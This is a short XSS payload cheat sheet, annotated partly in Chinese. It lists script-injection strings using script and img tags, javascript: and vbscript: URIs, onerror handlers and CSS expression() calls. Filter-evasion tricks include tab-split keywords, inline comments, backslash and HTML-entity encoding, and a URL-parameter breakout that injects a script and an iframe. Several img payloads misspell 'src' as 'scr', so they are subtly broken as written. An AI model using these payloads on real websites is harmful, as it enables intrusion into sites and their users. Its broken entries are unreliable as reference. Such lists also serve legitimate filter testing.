<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["